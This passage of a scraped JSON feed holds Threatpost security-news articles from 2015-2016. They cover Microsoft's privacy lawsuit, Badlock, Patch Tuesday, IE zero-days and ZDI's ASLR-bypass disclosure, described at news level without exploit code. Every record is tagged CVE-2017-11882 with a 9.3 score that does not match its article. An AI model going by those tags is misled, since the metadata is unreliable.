think this lawsuit will provide a much needed venue to address the lack of notice for email warrants,\u201d Butler said. \u201cCongress has had the opportunity in the past to address this problem, but has not yet taken the steps necessary to do so. The court should reaffirm that notice is a critical component of government searches under the Fourth Amendment,\u201d he said. \n\nAs for Microsoft\u2019s hope of victory? EFF\u2019s Crocker said Microsoft has a strong case. \u201cGiven the numbers Microsoft lists in the complaint and the statute\u2019s failure to comport with the First Amendment, I think there\u2019s a pretty good likelihood the suit will at the minimum force some changes to the government\u2019s practices or ECPA,\u201d Crocker said. \n\nBecause of the secret nature of such requests, it\u2019s impossible to tell how many secret government information requests businesses receive. One estimate from a 2012 report authored by Texas Southern University\u2019s Thurgood Marshall School of Law called \u201c[Gagged, Sealed &amp; Delivered](<https://papers.ssrn.com/sol3/papers.cfm?abstract_id=2071399>)\u201d (PDF), estimates 30,000 electronic surveillance orders approved by magistrate judges each year. \n\u201cIndividuals have a constitutional right to receive notice when their persons, papers, and effects have been subject to search. The denial of this right is a harm, and prevents realistic engagement by the public on an issue of national importance (privacy),\u201d EPIC\u2019s Butler said. \n", "cvss3": {}, "published": "2016-04-15T15:22:02", "type": "threatpost", "title": "Microsoft Wins Widespread Support in Privacy Clash With Govt.", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-15T19:22:02", "id": "THREATPOST:A0EA2808DE56569B593A4E0254EC09CD", "href": "https://threatpost.com/microsoft-wins-widespread-support-in-privacy-clash-with-government/117458/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:35", "description": "Despite the [Badlock hype machine](<https://threatpost.com/badlock-vulnerability-falls-flat-against-its-hype/117349/>) cranked up high, we don\u2019t know much about this impending soul-crushing vulnerability other than it could be bad, it could be in the Windows Server Message Block and it already has its own requisite logo and website.\n\nNonetheless, we have a little more than two weeks before the next Microsoft Patch Tuesday on April 12 to speculate, guess and fear what might come first: the patch or a public exploit.\n\nStefan Metzmacher, a member of the Samba team and an employee with German consultancy SerNet, is credited with finding the bug and said both Samba and Windows will be patched. He said deductive reasoning leads us to consider that the bug might be in Server Message Block (SMB). Samba is an open source SMB implementation.\n\nBug hunters, good and bad, are surely on the case and some have already found what could be a juicy clue in one of Metzmacher\u2019s [commits to git.samba.org](<https://git.samba.org/?p=samba.git;a=blob;f=source4/libcli/smb2/lock.c;h=f2a76d876a103ce0dd06a5b362c2e629974772d5;hb=HEAD>). Metzmacher is the author of the lock.c file in Samba\u2014it handles SMB2 client lock handling\u2014and within a particular commit he includes a comment: \u201d /* this is quite bizarre \u2013 the spec says we must lie about the length! */\u201d\n\nThere\u2019s no confirmation this is the bug, but one researcher told Threatpost that the comment indicates that there are places in the protocol where the size of a string would be misrepresented. This could lead to serious errors because a developer could use the size to allocate space in a buffer, which is fine if the number is accurate. But if the length is a \u201clie\u201d as Metzmacher says, and you copy more bytes than there is room allocated, you have a buffer overrun and code execution.\n\nWhether this is enough information there for an exploit writer to craft something nasty in the next two weeks remains to be seen. One thing is for certain, however: defenders will sway in the wind for the next 15 days.\n\n\u201cA skilled exploit writer may have enough information to write an exploit based on this information. On the other hand, as a defender, I am missing some details,\u201d said Johannes Ullrich, dean of research at the SANS Institute and director of the SANS Internet Storm Center. \u201cFor example, it would be nice to know if this affects servers only, or clients as well. Which network ports and which SMB version are affected? These are things that would help defenders, but they are missing from the advisory.\u201d\n\nThe [Badlock website](<http://badlock.org/>) isn\u2019t helpful on details either, other than to say that patches will be available for Samba 4.4, 4.3 and 4.2; it cautions that since Samba 4.4.0 was released March 22, Samba 4.1 will no longer be supported.\n\nThe SANS website, meanwhile, cautions that UNIX administrators need to pay attention to the details once they\u2019re made public, and suggest [scanning environments](<https://isc.sans.edu/diary/Getting+Ready+for+Badlock/20877>) for servers with SMB enabled; it\u2019s expected that UNIX implementations would also patch on or around the April 12.\n\nIn the meantime, the situation has also stirred up a healthy debate over whether big bugs are being trivialized, not only by self-serving advanced notification, but also by websites and branding with logos.\n\nFrom Badlock.org:\n\n> \u201cThe main goal of this announcement is to give a heads up and to get you ready to patch all systems as fast as possible and have sysadmin resources available on the day the patch will be released. Vendors and distributors of Samba are being informed before a security fix is released in any case. This is part of any Samba security release process.\n> \n> Weighting to the respective interests of advance warning and utmost secrecy we chose to warn you beforehand, so that everyone has a chance to be ready to install the fixes as soon as they are available. Once the patch is released to the public, it will point to attack vectors and exploits will be in the wild in no time.\u201d\n\nMicrosoft has chosen not to add anything to the discussion; a representative told Threatpost: \u201cUnfortunately, Microsoft doesn\u2019t have anything to share.\u201d Sernet CEO Johannes Loxen refused to comment further in an email to Threatpost beyond what is on the badlock.org side. Loxen did concede in a tweet that the advanced notification on the bug is self-serving in terms of marketing and attention toward his company. The tweets have since been deleted.\n\nDan Kaminsky, whose 2008 DNS vulnerability and patch coordination is largely considered the first of its kind, was critical of the hype. He told _Wired_ that this [type of disclosure](<http://www.wired.com/2016/03/hype-around-mysterious-badlock-bug-raises-criticism/>) isn\u2019t helpful to admins. \u201cWhat\u2019s the call to action other than to pay attention?\u201d\n\nAndrew Storms, vice president of security services at New Context, recalled the angst for some around Microsoft\u2019s decision of last January to discontinue Patch Tuesday advanced notification and limit it only to [paying Premier customers](<https://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294/>).\n\n\u201cI\u2019ve always been a proponent of the advanced notification. And I was one of the people upset when Microsoft closed up ANS. That few days of heads up gives managers a chance to prep resources,\u201d Storms said. \u201cWhether that\u2019s people or servers or test systems, I\u2019ve always contended that some heads up is better than the big surprise disruption.\u201d\n\nSANS\u2019 Ullrich said advanced notification allows for preparation in areas such as inventories of vulnerable systems, counter measures and configuration options, all of which speed up patching. \n\u201c\u2018Branded\u2019 vulnerabilities are likely patched faster and more organizations will patch them given the attention paid to them (it would be nice to collect some hard numbers on this, but I haven\u2019t seen any studies to that effect yet),\u201d Ullrich said. \u201cOn the other hand, \u2018branded\u2019 vulnerabilities should be reserved for the most severe vulnerabilities. In that way, we will have to see if this vulnerability does meet that threshold.\u201d\n", "cvss3": {}, "published": "2016-03-28T11:45:05", "type": "threatpost", "title": "Badlock Bug in Samba SMB Protocol", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-04-12T18:50:16", "id": "THREATPOST:40C7024941C4F0096D439BD79BF49C6D", "href": "https://threatpost.com/badlock-vulnerability-clues-few-and-far-between/117008/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:55:48", "description": "TENERIFE, Spain \u2013 Network defenders who rely solely on lists of assets to protect are running a fool\u2019s errand.\n\nInstead, it\u2019s crucial to think in graphs to not only visualize threats, but also to understand network edges, and dependencies between assets and accounts in order to be able to capture attacker activities and render them useless.\n\nJohn Lambert, general manager of Microsoft\u2019s Threat Intelligence Center, said in today\u2019s keynote address at the Kaspersky Lab Security Analyst Summit that while successful defenders may understand the basic security principles of confidentiality, integrity and availability, they\u2019re interpreting each point on the triad in radically new ways.\n\n\u201cThey\u2019re discarding stuff that doesn\u2019t work,\u201d Lambert said. \u201cAnd stuff they don\u2019t have, they\u2019re inventing it.\u201d\n\nLambert recalled a time not so long ago when defenders were too protective of their intelligence. It was crucial to understand the assets in their environments, develop incident response plans, and view penetration test results as a report card on their internal security\u2014an output. Intelligence was rarely shared; for example, analysts weren\u2019t sent to security conferences for fear of \u201cblabbing\u201d threat indicators that might give away a competitive advantage.\n\nModern defenders cannot afford to think that way, Lambert said. One graph he demonstrated showed a graph of dependencies between network edges, accounts, permissions that spread across the screen like bacteria in a petri dish.\n\n\u201cModern defenders, they have a graph of things to protect,\u201d Lambert said. \u201cThey think about adversaries and their next move. They find trusted peers in the community, and understand the importance of learning from others and their practices. Pen-tests are diagnostics to successful defenders, not a report card. Pen-tests are input, with a goal of increasing attacker requirements.\u201d\n\nLambert shared examples of changes Microsoft has made to core security and detection processes that have eventually made their way into patches and updates that have eliminated scores of zero-days.\n\n\u201cWe are in a world where modern defenders are sharing about adversaries across geographies, industries and even within lines of competition,\u201d Lambert said. \u201cThreats are common thing we all face. There\u2019s no magical information-sharing thing. It\u2019s a trust-based thing. You have to get to know people, you\u2019re not trading with a vendor, you\u2019re sharing with a person. It\u2019s not a transactional relationship. You want to give them indicators because you want them to find more out there and it will help you down the line.\u201d\n\nThe goal should be not only to get attackers off your network and imprison hacker activity, but also to raise the cost of exploit development for attackers.\n\n\u201cYou want to force adversaries to go back to development,\u201d Lambert said, adding that cooperation, even among professional competitors, leads to important research being published, which could awaken others to lend a fresh set of eyes to the problem.\n\n\u201cThe goal should be to remove all of us from a world of information siloes and not sharing, to a world where hacker activity is imprisoned and all their opsec mistakes are trapped and can\u2019t be used anymore,\u201d Lambert said. \u201cKnowledge of intrusion sets grows and grows. This just serves to improve adversary coverage and helps everyone.\u201d\n", "cvss3": {}, "published": "2016-02-08T08:05:53", "type": "threatpost", "title": "Modern Defenders Share, Visualize and Succeed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2016-02-17T16:28:47", "id": "THREATPOST:1BC8168472B040DAEF3D3D5CCC865068", "href": "https://threatpost.com/modern-defenders-share-visualize-and-succeed/116181/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:09", "description": "Microsoft launched a new transparency website this week that bundles reports detailing requests for data the company has received, including those from law enforcement, the government, and elsewhere.\n\nThe page, which Microsoft is calling its [Transparency Hub](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/>), is somewhat similar to [what Apple did last month](<https://threatpost.com/apple-goes-all-in-on-privacy/114846/>) when it looped all of its transparency reports together on one page.\n\nWhile Microsoft has issued transparency reports regarding requests from law enforcement and the U.S. government in the past, this is the first time it\u2019s broken down requests the company has received from other parties to outright remove content on sites such as its search engine Bing.\n\nLike the other two reports, the \u201c[Content Removal Requests Report](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/crrr/>)\u201d pertains to requests from the first six months of the calendar year. The main difference is this report mostly culls information on requests from other governments, requests from European residents citing a special European Court of Justice ruling, and requests from copyright owners claiming their work was infringed.\n\nAccording to the report, China far and away had the most requests for content to be removed, with 165 requests filed compared to 11 from the United States, and 10 from Austria, Germany, Russia, and the U.K. combined. The report doesn\u2019t specify exactly what the content was or where it was located, but claims the numbers are from Microsoft entities like Bing, OneDrive, and MSN.\n\nThere were many more requests to remove copyrighted information, just north of one million, according to Microsoft. In this case, it was usually URLs that were being shown in Bing searches that contained copyrighted material. Microsoft claims it complied with 92 percent of requests. Since this is an inaugural report however, there are no statistics from last year to compare the numbers to.\n\nThe company received 3,546 requests from European residents to remove results for queries in Bing that included their name. A rule passed last year called the \u2018Right To Be Forgotten\u2019 rule allows users to ask their name be removed if the results were inadequate, inaccurate or no longer relevant. Microsoft complied with 50 percent of those requests.\n\nAs far as law enforcement requests, Microsoft received 35,228, a slight uptick from the second half of 2014 when it received 31,002. The report claims only three percent of requests it received led to the disclosure of content customers created, shared or stored on its services. The company rejected 12 percent of requests, up from 7.5 percent in the second half of last year.\n\nThe company, as it\u2019s done for the past several years, also claims it received somewhere [between zero and 999 National Security Letters](<http://www.microsoft.com/about/corporatecitizenship/en-us/transparencyhub/fisa/>). The government only permits companies to disclose requests in bands of 1000, which explains the vague number.\n\nThe company got permission to start sharing information pertaining to legal demands they receive in early 2014 but has been posting the reports pertaining to law enforcement twice a year [since 2013](<https://threatpost.com/microsoft-transparency-report-shows-company-supplied-user-content-22-cases-032113/77653/>), largely in response to a growing demand for transparency from big data companies in the post-Snowden world.\n", "cvss3": {}, "published": "2015-10-15T15:32:57", "type": "threatpost", "title": "Latest Microsoft Transparency Report Details Content Removal Requests", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-15T19:32:57", "id": "THREATPOST:6232FE8F8C59D8BBBD6CD0EAAD3D4AA3", "href": "https://threatpost.com/latest-microsoft-transparency-report-details-content-removal-requests/115062/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:10", "description": "Microsoft\u2019s monthly release of security bulletins today is a relatively light load of patches to be tested and deployed. The real news, however, could be in a separate advisory in which it continues to deprecate the outdated RC4 encryption algorithm.\n\nFollowing its initial advisory in May that applied to the .NET framework, today\u2019s move [extends RC4 deprecation](<https://support.microsoft.com/en-us/kb/2978675>) to Windows 10 systems that are running .NET Framework 3.5 applications and systems with .NET Framework 4.6 installed that are running .NET Framework 4.5/4.5.1/4.5.2 applications.\n\nThe advisory also updates the default transport encryption in Windows to TLS 1.2.\n\nThe move is timely as the industry continues to move away from weakened encryption. For example, a recent academic paper projects that the time to arrive at a [practical SHA-1 collision attack](<https://threatpost.com/practical-sha-1-collision-months-not-years-away/114979/>) can now be measured in months, not years. Continuous improvements to processing speeds and availability and tweaks to existing attacks put weak encryption within reach of well funded criminal or state-sponsored operations.\n\nAs for today\u2019s half-dozen security bulletins, Microsoft has rated three of them as critical, including the ubiquitous Internet Explorer rollup and patches for remote code execution vulnerabilities in the VBScript and Jscript engines in Windows.\n\nFour vulnerabilities are addressed in [MS15-108](<https://technet.microsoft.com/en-us/library/security/MS15-108>), none of which have been publicly disclosed; Microsoft said it also not aware of public exploits.\n\nMicrosoft said attackers could host an exploit online or phish users with a malicious ActiveX control embedded in an Office document that uses the Internet Explorer rendering engine to redirect users to the malicious website.\n\nThe vulnerabilities affect Vista, Windows Server 2008 and Server Core installations of Windows Server 2008 R2. Today\u2019s update patches two separate scripting enginer memory corruption vulnerabilities, an information disclosure flaw and an ASLR bypass.\n\n\u201cThe update addresses the vulnerabilities by modifying how the VBScript and JScript scripting engines handle objects in memory, and helping to ensure that affected versions of VBScript properly implement the ASLR security feature,\u201d Microsoft said in its advisory.\n\n\u201cWith the number of JScript and VBscript related vulnerabilities addressed this month, Microsoft needs to adopt a disabled by default strategy with those technologies until they can be removed entirely,\u201d said Core Security systems engineer Bobby Kuzma. \u201cUnfortunately that will never happen, due to the huge legacy application technical debt held by large organizations and governments worldwide.\u201d\n\nMicrosoft also patched 14 vulnerabilities in Internet Explorer and two more in Microsoft Edge browser for Windows 10 systems.\n\nMost of the IE update addresses memory corruption vulnerabilities in [MS15-106](<https://technet.microsoft.com/library/security/MS15-106>) along with a handful of privilege elevation and information disclosure flaws. There is also some overlap with the VBScript and Jscript bulletin, since IE is the principal attack vector there. One of the IE bugs, reported by researchers at FireEye, has been publicly disclosed, but none of the flaws have been exploited in the wild, Microsoft said.\n\nThe Microsoft Edge bulletin, [MS15-107](<https://technet.microsoft.com/library/security/MS15-107>), is rated moderate and takes care of a vulnerability that enables bypass of the browser\u2019s cross-site scripting filter, and a separate information disclosure vulnerability.\n\nThe remaining critical bulletin patches a remote code execution vulnerability in Windows Shell.\n\n\u201cThe vulnerabilities could allow remote code execution if a user opens a specially crafted toolbar object in Windows or an attacker convinces a user to view specially crafted content online,\u201d Microsoft said in advisory [MS15-109](<https://technet.microsoft.com/library/security/MS15-109>).\n\nThe remaining bulletins are rated important by Microsoft.\n\n[MS15-110](<https://technet.microsoft.com/library/security/MS15-110>) patches three remote code execution vulnerabilities in Microsoft Office, all of which are memory corruption flaws, while [MS15-111](<https://technet.microsoft.com/library/security/MS15-111>) is a Windows kernel update that patches five vulnerabilities, including three different privilege elevation flaws, a memory corruption issue, and a Trusted Boot bypass.\n", "cvss3": {}, "published": "2015-10-13T14:39:57", "type": "threatpost", "title": "October 2015 Microsoft Patch Tuesday Security Bulletins", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-10-14T20:03:27", "id": "THREATPOST:5083983BB9656C8F9FD41E7297B634C9", "href": "https://threatpost.com/microsoft-releases-six-bulletins-continues-rc4-deprecation/115017/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:19", "description": "About a decade ago, many large software makers learned some very difficult lessons about software security and building security into their products from the start. Some are still learning. The FTC and a variety of security experts are hoping that today\u2019s crop of start-ups will not have to go through that same painful process.\n\nThe FTC is launching a new initiative aimed at start-ups, called [Start With Security](<https://www.ftc.gov/tips-advice/business-center/guidance/start-security-guide-business>), that\u2019s designed to help smaller companies build security into not just their products, but also into their cultures. One of the thrusts of that effort is encouraging companies to begin thinking about the security of their products from the very beginning of the design and development process. This is something that vendors such as Microsoft, Adobe, and many others have been doing for some time.\n\nBut that\u2019s not always because someone inside the company just thought it was a keen idea. In most cases, the changes the software makers made were in response to repeated public attacks on their products and pressure from customers for change. Microsoft is the perfect example. Following a series of major worms that exploited bugs in their products, the company did an about-face on security.\n\n[Window Snyder](<https://threatpost.com/how-i-got-here-window-snyder/114524/>), who was in the security group at Microsoft at the time, said during a panel at an [event](<https://www.ftc.gov/news-events/events-calendar/2015/09/start-security-san-francisco>) sponsored by the FTC in San Francisco Wednesday that the change was an incredibly difficult one for the company.\n\n\u201cThe real motivator for change at Microsoft was a tremendous amount of pain. You guys don\u2019t have to go that route,\u201d said Snyder, who is now the CSO at Fastly.\n\n\u201cThe cost to Microsoft to make those kinds of changes was tremendous. It was a huge challenge for them to try and turn the ship at that point. That was a huge cost and you don\u2019t want to do it at the end, you want to do it at the beginning. That\u2019s the time to think about security.\u201d\n\nNot only is the process simpler when you start thinking about security early, it\u2019s far less expensive, the panelists said.\n\n\u201cSecurity is much, much, much cheaper the earlier you do it,\u201d said Devdatta Akhawe, a security engineer at Dropbox. \u201cEither you can plan for security early on and be happy later, or keep fighting and have an expensive battle later on.\u201d\n\nThis is a message that software security experts and many others have been trying to convey to developers and design teams for a long time, with varying levels of success. Many large enterprises, not just commercial software vendors, have adopted secure coding and threat modeling practices and become involved in projects such as [BSIMM](<https://www.bsimm.com>), a software security maturity model.\n\nBut getting the security message across to non-security people can be a difficult process. Frank Kim, CISO of The SANS Institute, said making the risks and rewards real for people is an important aspect of the effort.\n\n\u201cYou have to focus on telling stories. You can\u2019t just go and say, There\u2019s a vulnerability in this line of code and you\u2019re a terrible person,\u201d Kim said. \u201cWe make it tangible and concrete by telling stories about what can happen to your application as a result of that vulnerability.\u201d\n\nThe seriousness of the security problem is not lost on officials at the top of the FTC, which is responsible for investigating and punishing companies that fail to live up to security and privacy standards.\n\n\u201cIn a world where everything is connected, insecure products and services can have severe consequences. It\u2019s never been more clear that we must secure the software supporting our digital lives,\u201d FTC Chairwoman Edith Ramirez said in her opening remarks at the event.\n", "cvss3": {}, "published": "2015-09-09T15:03:39", "type": "threatpost", "title": "FTC, Experts Push Startups to Think About Security From the Beginning", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-09-09T19:03:39", "id": "THREATPOST:A3218B82F449C5905D1957A1C264C1C1", "href": "https://threatpost.com/ftc-experts-push-startups-to-think-about-security-from-the-beginning/114612/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:31", "description": "**UPDATE**\u2013As if all of the vulnerabilities in Flash and Windows discovered in the Hacking Team document cache and the 193 bugs Oracle fixed last week weren\u2019t enough for organizations to deal with, HP\u2019s Zero Day Initiative has released four new zero days in Internet Explorer Mobile that can lead to remote code execution on Windows Phones.\n\nThe four vulnerabilities originally were reported to Microsoft as affecting IE on the desktop, and later on it was discovered that they also affected IE Mobile on Windows Phones. Microsoft has patched all of the vulnerabilities in the desktop version of the browser, but the bugs remain open on IE Mobile. ZDI\u2019s original advisories on these flaws said that they were zero days on Internet Explorer, as well. The company updated the advisories late Thursday to reflect the fact that the bugs only affect IE Mobile.\n\n\u201cWe\u2019re aware of the reports regarding Internet Explorer for Windows Phone. A number of factors would need to come into play, and no attacks have been reported. We continue to monitor the situation and will take appropriate steps to protect our customers,\u201d a Microsoft spokesperson said.\n\nEach of the four vulnerabilities is in a different component of the browser, but they all are remotely exploitable. The advisories from ZDI say that attackers could exploit these vulnerabilities through typical drive-by attacks.\n\nThe most severe of the four vulnerabilities is a bug in the way that Internet Explorer handles some specific arrays.\n\n\u201cThe vulnerability relates to how Internet Explorer processes arrays representing cells in HTML tables. By manipulating a document\u2019s elements an attacker can force a Internet Explorer to use memory past the end of an array of HTML cells. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory from ZDI](<http://www.zerodayinitiative.com/advisories/ZDI-15-359/>) says.\n\nThat vulnerability was discovered as part of the Mobile Pwn2Own contest in November and ZDI disclosed it to Microsoft at the time. ZDI has a policy of disclosing privately reported vulnerabilities after 120 days, even if the affected vendor has not released a patch. Microsoft has not issued patches for any of the four vulnerabilities disclosed by ZDI this week.\n\nAmong the other vulnerabilities the company disclosed is a flaw in how IE handles some objects.\n\n\u201cThe specific flaw exists within the handling of CAttrArray objects. By manipulating a document\u2019s elements an attacker can force a dangling pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process,\u201d the [advisory](<http://www.zerodayinitiative.com/advisories/ZDI-15-360/>) says. \n\nThe other two vulnerabilities are similar, in that they involve IE mishandling certain objects. IE will in some circumstances mishandle CTreePos and CCurrentStyle objects, leading to a dangling pointer that an attacker can reuse. \n\n_This story was updated on July 23 to add context about the flaws only affecting IE Mobile and the comment from Microsoft. _\n\n_Image from Flickr photos of [C_osett](<https://www.flickr.com/photos/mstable/>). _\n", "cvss3": {}, "published": "2015-07-23T09:14:36", "type": "threatpost", "title": "Four Zero Days Disclosed in Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-07-28T14:23:41", "id": "THREATPOST:59C4483705849ADA19D341EFA462DD19", "href": "https://threatpost.com/four-zero-days-disclosed-in-internet-explorer/113911/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:56:42", "description": "Researchers at HP\u2019s Zero Day Initiative have disclosed full details and proof-of-concept exploit code for a series of bugs they discovered that allow attackers to bypass a key exploit mitigation in Internet Explorer.\n\nThe disclosure is a rarity for ZDI. The company typically does not publish complete details and exploit code for the bugs it reports to vendors until after the vulnerabilities are fixed. But in this case, Microsoft has told the researchers that the company doesn\u2019t plan to fix the vulnerabilities, even though the bugs were serous enough to win ZDI\u2019s team a $125,000 [Blue Hat Bonus](<https://threatpost.com/microsoft-launches-100000-bug-bounty-program/101015>) from Microsoft. The reason: Microsoft doesn\u2019t think the vulnerabilities affect enough users.\n\nThe vulnerabilities that the ZDI researchers submitted to Microsoft enable an attacker to fully bypass ASLR (address space layout randomization), one of the many mitigations in IE that help prevent successful exploitation of certain classes of bugs. ZDI reported the bugs to Microsoft last year and disclosed some limited details of them in February. The researchers waited to release the full details until Microsoft fixed all of the flaws, but Microsoft later informed them that they didn\u2019t plan to patch the remaining bugs because they didn\u2019t affect 64-bit systems.\n\n\u201cIn this situation, Microsoft\u2019s statement is technically correct \u2013 64-bit versions do benefit from ASLR more than 32-bit versions. A 64-bit system has a much larger address space than a 32-bit system, which makes ASLR that much more effective. However what is lost here is that the bypass described and submitted only works for 32-bit systems, which is the default configuration on millions of systems. To demonstrate this, we have released proof-of-concept (PoC) code to demonstrate this bypass on Windows 7 and Windows 8.1,\u201d a blog [post](<http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/There-and-back-again-a-journey-through-bounty-award-and/ba-p/6756465#.VYgirOs2ItZ>) from Dustin Childs of HP says. \n\nChilds, who is a former Microsoft security official, said ZDI is releasing the details and [PoC code](<https://github.com/thezdi/abusing-silent-mitigations>) in order to give users as much information as possible to defend themselves against potential attacks.\n\n\u201cSince Microsoft feels these issues do not impact a default configuration of IE (thus affecting a large number of customers), it is in their judgment not worth their resources and the potential regression risk. We disagree with that opinion and are releasing the PoC information to the community in the belief that concerned users should be as fully informed as possible in order to take whatever measures they find appropriate for their own installations,\u201d he said.\n\nMicrosoft did not provide a comment in time for publication of this story.\n", "cvss3": {}, "published": "2015-06-22T15:11:28", "type": "threatpost", "title": "HP Releases Details, Exploit Code for Unpatched IE Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-06-25T21:13:37", "id": "THREATPOST:DC91